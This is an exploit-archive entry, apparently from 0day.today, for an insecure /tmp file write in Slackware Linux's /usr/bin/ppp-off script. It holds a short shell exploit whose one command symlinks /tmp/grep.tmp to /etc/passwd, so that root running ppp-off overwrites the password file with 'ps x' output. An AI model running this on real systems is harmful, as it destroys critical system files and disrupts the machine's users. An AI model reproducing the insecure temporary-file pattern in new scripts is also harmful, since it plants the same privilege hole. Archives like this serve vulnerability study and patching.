id: 5802
date: 11/17/2000
title: Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit
author: sinfony
cves: 

===========================================================
Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit
===========================================================



#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off,  a non-privileged  user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the  ppp-off script, the  output of 'ps x'
# would be put in the linked file. 
#                                                   sinfony

ln -s /etc/passwd /tmp/grep.tmp




#  0day.today [2023-03-23]  #